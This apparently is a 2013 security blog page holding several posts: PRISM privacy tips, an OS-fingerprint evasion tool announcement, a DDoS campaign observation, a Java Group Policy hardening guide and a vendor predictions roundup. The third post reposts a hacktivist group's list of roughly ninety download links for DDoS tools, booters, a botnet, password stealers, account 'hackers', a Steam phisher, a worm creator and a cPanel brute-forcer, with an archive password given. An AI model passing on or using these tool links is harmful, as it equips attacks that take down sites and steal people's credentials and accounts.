Latest Security News

Some PRISM post mortal conclusions




Following the understanding of NSA  ways of intercepting our digital communication, and the shutting down of services like LavaBit email encryption services,here our some quick conclusions

  1. Never trust a third party in holding your encryption keys ,so if Google will start encrypt your email on their hard disks (like they recently published ) , they will still hold the keys and some day will hand them to the NSA or another agencies.
  2. try to use open source as much as we can ,you don't know what or when a commercial company will put a backdoor for NSA or alike.
  3. make our "followers " life harder using software and services like: GPGSilent CircleTailsOTRTrueCryptBleachBit




OSFOOLER - an upcoming tool for OS fingerprinting evasion

Using commercial tools to secure your network is recommended, but it is necessary to be one step further to keep the system secure. With this technique you can give that step in order defend your servers against the first phase of all attacks Fingerprinting. This is done by intercepting all traffic that your box is sending in order to camouflage and modify in real time the flags in TCP/IP packets that discover your system.
This tool is a practical approach for detecting and defeating:
  • Active remote OS fingerprinting: like Nmap or Xprobe
  • Passive remote OS fingeprinting: like p0f or pfsense
  • Commercial engines like Sourcefire's FireSiGHT OS fingerprinting
Some features are:
  • No need for kernel modification or patches
  • Highly portable
  • Will emulate any OS
  • Capable of handling nmap and p0f fingerprint database (beta phase)
  • Transparent for the user
  • Undetectable for the attacker
  • Available for your Linux laptop, server and mobile device
Sorry guys, remote OS fingerprinting is over...

tools that anonymous uses and more..


  1. TOOLZ VERIFIED BY N4M3LE55 CR3W
  2. --------------------------------------
  3. Our j.s. l.o.i.c
  4. http://goo.gl/90uxY
  5. JS LOIC
  6. http://goo.gl/VGK6c
  7. http://goo.gl/eb9jR
  8. http://goo.gl/uV9VZ
  9. http://goo.gl/3MAz3
  10. Any Password is 123123
  11. **AnonGun : https://rapidshare.com/files/1746996499/anonguns__1_.rar
  12. **HOIC : http://www.mediafire.com/?5su5vuj90cirm4p
  13. **LOIC : http://sourceforge.net/projects/loic/
  14. **Ddos notepad : http://www.mediafire.com/?76advu6rdckmuyv
  15. **LOWC : http://www.lowc.do.am/script.html
  16. **hoic : http://www.4shared.com/folder/HIoc7FE4/_online.html
  17. **ByteDOS V3.2 : http://www.mediafire.com/?pxv4pbxjg3a2vqa
  18. **Loic : http://www.mediafire.com/?4exm4kghdcz316u
  19. **Hoic V2.1 : http://www.mediafire.com/?ddp9d5znwmgsasr
  20. **Turbinas V1.0 : http://www.mediafire.com/?wo4sh527nf7wais
  21. **Slowloris : http://www.mediafire.com/?6wbee516qfx6zok
  22. **SYN Flood DOS : http://www.mediafire.com/?ja4x2odlxn7xcq3
  23. **CYBERGHOST : http://cyberghost-classic-vpn.softonic.com/
  24. **Tunnelbear 1.0 : http://tunnelbear.softonic.com/
  25. **HOIC : http://www40.zippyshare.com/v/22430419/file.html
  26. **ByteDos : http://www40.zippyshare.com/v/79297507/file.html
  27. **Jays Booter : http://www40.zippyshare.com/v/76913295/file.html
  28. **HTTPFlooder : http://www40.zippyshare.com/v/57080337/file.html
  29. **HULK DDoSser : http://www.mediafire.com/?tb7d9t203v7twdy
  30. **TORSHAMMER : http://pastebin.com/Vq90V9yn
  31. **AnonymousDoSer : http://www.mediafire.com/?cth0qrycw4segok
  32. **ByteDOS v3.2 : http://www.mediafire.com/?cv3cdj5n5zsxzad
  33. **R.U.D.Y : http://hybridsec.com/resource.html
  34. **OWASP HTTP Tool: http://bit.ly/i0N6AY
  35. **LOIC: http://sourceforge.net/projects/loic/
  36. **HOIC: http://www.mediafire.com/? t1kejryfrtc8sqs
  37. **HOIC Torrent: http://bit.ly/LdAeDc
  38. **HOIC Booster Pack: http://pastebin.com/K13k40hC
  39. **Booster Guide: http://pastebin.com/5ZCcJ71u
  40. **Booster with Apache Exploit: pastebin.com/tca6fb49
  41. **Webhive with directions: http://pastebin.com/q8eBqitn
  42. **XerXes STRONG DDoSser : http://pastebin.com/aWZMbjSU
  43. **FireFlood : http://www.2shared.com/file/2CGUUHtB/Fireflood_12.html
  44. **Anonymous DoSer : http://www.2shared.com/file/UOZbt7I0/Anonymous_DoSer.html
  45. **Denial-of-service attack & Deface Programs : http://www.mediafire.com/?3j9lp4avc1tjplt
  46. **R-U-Dead-Yet : http://packetstormsecurity.org/files/95882/R-U-Dead-Yet-Denial-Of-Service-Tool.html
  47. **LOIC 1.0.7.42 : http://www20.zippyshare.com/v/36755757/file.html
  48. **LOIC 1.1.1.25 : http://www40.zippyshare.com/v/1539355/file.html
  49. ----------------------
  50. OTHER TOOLZ AND LINKS
  51. ----------------------
  52. **Backtrack 5 : http://www.backtrack-linux.org/downloads/
  53. **Net Tools : http://users.telenet.be/ahmadi/nettools.htm
  54. **Hash Cracker : http://www.hash-cracker.com/
  55. **Cloud Cracker : www.cloudcracker.net/
  56. **Hash Checker : http://www.hashchecker.de/find.html
  57. **AnonDEF : http://www.mediafire.com/?y772aargktqal8h
  58. **Ethical Hacking Forum : http://www.dl4hacks.net/
  59. **Cythisia Botnet v2 : http://www.mediafire.com/?ude4m1f00j9654p
  60. **SumRando : https://www.sumrando.com/
  61. **Real Hide IP : http://www.mediafire.com/?o454kp9q44d9h0w
  62. **Hotspot Shield : http://hotspotshield.com/
  63. **Expat Shield : http://expatshield.com/
  64. **SecurityKISS : http://www.securitykiss.com/
  65. **CyberGhost : http://cyberghostvpn.com/
  66. **Hack Clarify : http://www.hackclarify.blogspot.com/
  67. **Pack Del Hacker V.1.0 : http://www.mediafire.com/?bacx2g8w5ciy53b
  68. **Windows_DNS_ATTACK_TOOL : http://www.4shared.com/folder/Z8j1fcmx/Windows_DNS_ATTACK_TOOL.html
  69. **CpanelBruteReiluke : http://www.4shared.com/rar/mCX9cUj8/CpanelBruteReiluke.html
  70. **CyberShark : http://www.4shared.com/rar/-KWbHT6Z/CyberShark.html
  71. **EmailScraperWizardv06b : http://www.4shared.com/rar/37fAEEk2/EmailScraperWizardv06b.html
  72. **Gmail_Hacker : http://www.4shared.com/rar/HVPWkugE/Gmail_Hacker.html  
  73. **firefox password stealer : http://www.4shared.com/rar/mc6O2CeP/firefox_password_stealer.html
  74. **ICQ Steal0r : http://www.4shared.com/rar/VEKkKGMx/ICQ_Steal0r.html
  75. **IP Port Scanner :  http://www.4shared.com/file/tSUugyaD/IP_Port_Scanner.html
  76. **IP Scanner : http://www.4shared.com/file/LCRDLMmb/IPScanner.html
  77. **spoofer-linux-0.8.tar.gz : http://www.4shared.com/archive/6SrD1gYi/spoofer-linux-08tar.html
  78. **Sql Poison v1.0 - The Exploit Scanner.rar : http://www.4shared.com/rar/5rmyxFFr/Sql_Poison_v10_-_The_Exploit_S.html
  79. **Codesoft PW Stealer 0.50 : http://www.4shared.com/rar/7tKO7hEn/Codesoft_PW_Stealer_050.html
  80. **DHCP_IP_Forcer : http://www.4shared.com/rar/FatXftW_/DHCP_IP_Forcer.html
  81. **EasyLogger2.1 : http://www.4shared.com/rar/ugM6KMI3/EasyLogger21_Public.html
  82. **Fast_Yahoo!_ID_Controller : http://www.4shared.com/rar/3VOV8eUD/Fast_Yahoo_ID_Controller.html
  83. **HSS-2.78-install-hss-417 : http://www.4shared.com/file/9RC339FS/HSS-278-install-hss-417-condui.html
  84. **Pro Facebook Hack v 2.0 By Anonymouse : http://www.4shared.com/rar/cWC7jXWG/Pro_Facebook_Hack_v_20_By_Anon.html
  85. **WinRAR Full Version : http://www.4shared.com/zip/U_gKAYk1/WinRAR_Full_Version.html
  86. **Worm Creator : http://www.4shared.com/rar/I_DKX36k/Worm_Creator.html
  87. **firefox password stealer  : http://www.4shared.com/rar/aBe1gFpa/firefox_password_stealer_-_ste.html
  88. **hackbase steam phisher 1.2 : http://www.4shared.com/rar/RYesyUM0/hackbase_steam_phisher_12_beta.html
  89. **(over 100 more tools are on here https://www.dropbox.com/sh/d8df3ry31ijbqkf/PZBrMBFkKT )**
  90. WE ARE #N4M3LE55 CR3W 2.0
  91. Expect US!
  92. https://www.facebook.com/TheN4m3le55Cr3w
  93. n4m3le55cr3w@hush.ai

Obama's visit to Israel leads to Another DDoS campaign against Israel sites

When investigating  the Israel's bank attack:
The attackers communicates on twitter .
They publish links that instruct what site to attack
They are using an DDOS attack which include a special application for SYN FLOOD or ICMP FLOOD on port 80,443
So if you are working for an Israelis vendor ,you should be looking for large sync tcp packets or icmp packets traffic on port 80 or 443  

I will keep watching the osint chennels ....

here are some recent  details :
The tool they recommend to use :





Twitter communication and instructions



Site  attacking instructions:




Online tool


Pcap finger print of the SYN PACKET



security tools tracking site -FYI

.
.A nice site that follows new security tools


http://www.toolswatch.org


Online free security school

On my endless search for new InfoSec ideas , I have stumbled upon the Open security training web site.

With tons of recorded lectures on various InfoSec topics.

I am going try one of their online free online courses. Will let you know….

Check it out:


YouTube page with all their lectures.




Centralized Management of Java SE Environment Using GPO (Redux)

Taken from  darkoperator blog:

My Adventures helping a friend secure his Java environment where fun, in my original blog post I used GPO to reduce the risk in his environment by crudely pushing  a configuration file to his environment. After 24 hours the fun started because we got insight from the support team, developer and users and came with a game plan.
The requirements:
  • Solution must provide the ability to configure Java 7 and Java 6.
  • Users must still be able to look at the settings in the Java control panel so they can relay information to helpdesk for troubleshooting.
  • The configuration files must be in a place where the can be replicated to Domain Controllers in other locations.
  • Solution must work on Windows Versions 5.x and 6.x
  • Policy Should only apply and create the files for machines with Java installed.
  • Policy should be robust enough to adapt is Java 6 or 7 are installed on the target in the case a computer is moved from one OU (Organizational Unit) to another.
Thankfully we worked and came with a much simple and easier to manage solution that made everyone happy (And me never volunteering to help).

Creating WMI Filter

When it comes to applying Group Policy Objects I find that WMI filters is one of the best ways to determining to what machines to apply a policy and to witch not. We start by creating 2 WMI filters one for Java 6 and another for Java 7. We first go in to Group Policy Management Console, and go in to WMI Filters:
image
We Right-Click on it and select New
image
We give it a name of Java SE 7 is Installed and a description of “For Policies that will only apply for hosts running Java SE 7” and we Click on Add to include our WMI WQL Query and we add the query
Select * From win32_Directory where (name="c:\\Program Files\\Java\\jre7" or name="c:\\Program Files (x86)\\Java\\jre7")
This WMI Query will look for bot X64 and X86 locations of the JRE7 Folder on the System and if found it will apply the policy.
image
We click on Save to save the query.
We would do the same for Java SE 6 if we want to cover it.

Creating Policy Files

Next we create policy files for Java in our domains \\FQDN\SYSVOL\FQDN\JavaPolicy folder where FQDN is the full path of your domain name. In my example I will create to folders one called JRE7Strict that will have restrictive settings and another called JRE7Block that will have the files to block Java on all web browsers.:
image
In Jave SE a deployment.config file is used for specifying the System-Level deployment.properties for use by all users of the system and it is located in %windir%\Sun\Java\Deployment\deployment.config. By default no deployment.config  or folder structure exists. The deployment.config file needs the option of deployment.system.config and it can point to a URL(HTTP or HTTPS) or a File Path that points to the deployment.properties to load, to ensure that the properties file in the user %APDATA% location is not loaded we set the deployment.system.config.mandatory option with a value of true. Our config file for the restricted settings would be:
deployment.system.config=file\://acmelabs.com/SYSVOL/acmelabs.com/JavaPolicy/JRE7Strict/deployment.properties
deployment.system.config.mandatory=true
and we would place the file in the JRE7Strict folder and we would create our Properties file with the options we want and to lock the options so they still show in the control panel but would be greyed out so they can not be modified we would also add a .locked line. A sample restricted properties file would look like:
deployment.security.level=VERY_HIGH deployment.security.level.locked deployment.security.askgrantdialog.notinca=false deployment.security.askgrantdialog.notinca.locked deployment.security.notinca.warning=true deployment.security.notinca.warning.locked
In the example I set the Security Level to Very High and locked it as well as other options. As domain admins we would save the files in the folder:
image
for a policy that would block Java on all the web browser we would only add to the properties file:
deployment.webjava.enabled=false
deployment.webjava.enabled.locked

Creating the Policy

The use of the centralized files it makes creating a policy file it is more simple. We just create a new GPO and we start by setting the creation of the folder where the config file will be placed so in the Policy we would go in toComputer Configuration –> Preferences –> Windows Settings –> Folders:
image 
We create a new entry for the creation of the folder %WinDir%\Sun\Java\Deployment
image
Now we can create an entry for copying the config file to the folde we go to Computer Configuration –> Preferences –> Windows Settings –> Files:
image
We now create a new file policy and set it to replace so updating only takes modifying the file it self we set  the Action to Replace so when the file is updated it will be sent to all the machines in the domain when they update their policy, we set the Source to \\FQDN\SYSVOL\FQDN\JavaPolicy\JRE7Strict\deployment.config and the Destination to%windir%\Sun\Java\Deployment\deployment.config:
image
Before we link the policy to any OU we must set the WMI filter we created so it will only create the folder and file on machines running the correct version of JRE
image
Once it is done we can link it to the OU we want the policy to apply to. Once a hosts update it’s policy via schedule or it is forced.
If you are running a Windows 2012 DC I recommend you go in to the Starter GPO’s and have the 2012 DC create them if they have not yet, if they have been already created and they where in a Windows 2008 or Windows 2008 R2 back the Starter GPOs, Delete the starter GPO folder from \\FQDN\SYSVOL\FQDN\, go back to the Group Policy Management Console on Windows 2012 and have it generate them, you should have 2 additional GPO templates for Firewall and Management configuration. From PowerShell (Had to sneak some PowerShell in Smile with tongue out) run:
New-GPO –Name "Configure firewall rules for remote gpupdate" –StarterGpoName "Group Policy Remote Update Firewall Ports" | New-GPLink –target "dc=acmelabs,dc=com" –LinkEnabled yes 
This will create a New Group Policy and link it to the Domain (Make sure you modify the DC values to the ones of your domain) that will allow you to force GPO updates against the host in the domain once the policy is applied.
To force a update of the policy from your Windows 2012 DC run Invoke-GPUpdate against the machines you want to update, in this example I’m running it against the HR OU where my test VM’s are in my lab:
  Get-ADComputer –filter * -Searchbase "ou=HR, dc=acmelabs,dc=com" | foreach{ Invoke-GPUpdate –computer $_.name -force} 
Once the policy has been updated we can just open the Java Control Panel and confirm the options have been set and that they are greyed out.
image
If the user tries to load a self-signed applet or one not in your trusted signature file he will get:
image
If the Applet is validly signed he will get a popup giving him a warning and allowing him to run run the applet:
image
This method can be used to set other policies like the path for the trusted signatures and PKI files plus settings. So make sure your applets are properly signed with valid certificate and modify your trusted CA file to only trust your vendor to reduce the risk of the attacker using a valid provider or even better use your own CA and signed your applets with your own cert.
Hope you find this useful and allow you to secure your Java environment in Windows.




Security predictions for 2013

taken from:  http://hackmageddon.com:

The period between November and December is particularly interesting for the Infosec community, since nearly all the main security vendors use to unveil their predictions for the next year, trying to anticipate the trends and the issues that will trouble the system administrators’ sleeps.
Exactly as I did last year, I analyzed the predictions of 7 vendors, choosing the ones that I consider particularly meaningful for the presence of the vendor in the market and for the coverage of their respective solution portfolio. In comparison with the last year, I was not able to find any prediction from Cisco (at least so far). However I was able to include the ones issued by Symantec, that were missing from my initial version. Hence the list of the vendors taken into consideration is the following:
Nearly all the analyzed vendors went through deep transformations during the past year, reflecting the changing trends in the market. Fortinet is considered a vendor focused on UTM Technologies, although it offers a wide portfolio of solutions ranging from endpoint to WAFs. After the acquisition of Astaro, Sophos is expanding its offering from the endpoints to the UTM segment. McAfee covers a wide area: historically focused on the endpoints, the long trail of acquisitions allows the company to be present in all the segments of the security market. Websense went through its historical flagship, the URL filtering, moving its security model to the endpoint. Symantec and Trend Micro have their foundation on the endpoints, but are more and more concentrated on securing the cloud. Kaspersky is still concentrated on the endpoints, although the company has been very active in the last year in the analysis of the cyberwar events, most of all in Middle East.Security Predictions 2013
Yes, the rise of the malware on mobile platforms seems unstoppable, not only it reached unprecedented levels in 2012, but apparently it will be the protagonist even for 2013, at least for 5 vendors on 7. Indeed the vendors are 6 if one considers also the cross-platform malware which is equally a threat for mobile platforms. Furthermore one vendor (Fortinet), considers the role of mobile threats also as a threat vector for APTs in 2013.
Politically motivated attacks rank at number 2, even if with different connotations: Kaspersky and Websense mention explicitly state-sponsored attacks, while Symantec and Trend Micro include also attacks motivated by hacktivism in this category. It is not a coincidence that Kaspersky and Websense include Hacktivism into an explicit prediction.
It is also interesting to notice the ransomware at number 3 with just 3 preferences. Particularly interesting the indication of Sophos that speaks of “Irreversible” malware, since this class of threats is increasingly using encryption to make the compromised content unrecoverable.
The trend is even more visible from the distribution chart, that also emphasizes the role of the cloud, in the double shape of source and target of the cyber attacks.
Security Predictions Distributions 2013
Two vendors (McAfee and Trend Micro) include the proliferation of embedded systems (for instance Smart TV equipped with Android) as one of the main security issues for 2013. Honestly speaking I would have expected a major impact for this threat.
Last but not least, two vendors (Kaspersky and McAfee) believe that Targeted Attacks and Signed Malware will experience a major rise in 2013.